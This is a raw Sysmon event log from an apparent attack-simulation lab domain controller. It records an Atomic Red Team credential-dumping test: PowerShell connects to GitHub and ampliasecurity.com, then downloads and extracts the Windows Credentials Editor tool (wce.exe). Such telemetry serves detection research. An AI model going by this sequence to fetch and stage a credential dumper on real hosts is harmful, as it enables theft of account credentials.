Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B72052055E4E452979A1D4E5115D54EC,SHA256=F5710E5342E1B0ED969CA1F8F5EC2F01509FC90A9BD824870DE84D91482351D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024791Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.729{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDB71816182E375E6B0AB8A92253D474,SHA256=43F42ABE4F3D52CD9DAC1D0AB9F8ABC7EF90487C8BE6E4C43214DA807E697474,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024790Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.432{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ABF4F6DCD83A55E8AFDA735BA6B66E00,SHA256=91CDB4033540A25B15FE1B30EAC6B6AC35E3E546E48D0CEABBD3BAF48477ED8A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024789Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.232{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61520-false10.0.1.12-8000- 11241100x800000000000000024798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.964{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\LICENSE.txt2021-06-23 21:09:51.964 22542200x800000000000000024797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.302{4DB9351A-A31D-60D3-2A06-00000000CF01}5208www.ampliasecurity.com0type: 5 ampliasecurity.com;::ffff:155.133.130.34;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000024796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.014{4DB9351A-A31D-60D3-2A06-00000000CF01}5208raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.902{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9EDD4C4C5521919334781C47667BD02,SHA256=17728DCCF66612519A86200A40800490620F7979FEB96919AACC3B5AE5DEB0C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.589{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=659B8B59DACA0A0A8D6106DFFA447D60,SHA256=71729F28007314CA957E419002818E17B4DC6279DA46EEF05CC3F2A0562BDDB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:51.589{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0DCB1AB34BE391E57B4D853C563FE72D,SHA256=6F8ECE9325A6C1DF0D57A5FB1877A1B870D2DD1C692C3F9AC1CD43DA0D2F6D4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.967{4DB9351A-A320-60D3-2E06-00000000CF01}6452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000024864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.964{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:52.104{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.104{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3
504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 
154100x800000000000000024807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.114{4DB9351A-A320-60D3-2B06-00000000CF01}7076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000024806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.089{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:50.457{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61522-false155.133.130.34-443https 354300x800000000000000024804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:50.018{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61521-false185.199.109.133cdn-185-199-109-133.github.com443https 23542300x800000000000000024803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\READMEMD5=E1D51CEF9AE367C7AFB01B20CED82491,SHA256=B9A938D4240BF7D9F08D90E581A67A4B909315AF7B3AE4BCB770C55FB1A284D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\LICENSE.txtMD5=4C3B8FDDD6A79B1080AC076D22E4F8B1,SHA256=0E67520EAAF05746F32CF71E369B534CF40B638604BC9D2066578CE3645C10A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\ChangelogMD5=56C15E17550E1298DEDE834303BCAC62,SHA256=EBAE677E6919EE3CDB2BA8A1840C6E39427809B588590F16695AF200CFF848AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:52.057{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce.zipMD5=D854CC12F7F94781632A47FE9CC8A72C,SHA256=8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:52.026{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce\wce.exe2021-06-23 21:09:52.026 23542300x800000000000000024887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.917{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2990ADF8BEE955EA03B760CBE0B56E74,SHA256=47DEA2FB8ECE5BB2E42BB234F188E9C3E2AA9A6D05D7852EBE9AB2214B279C61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 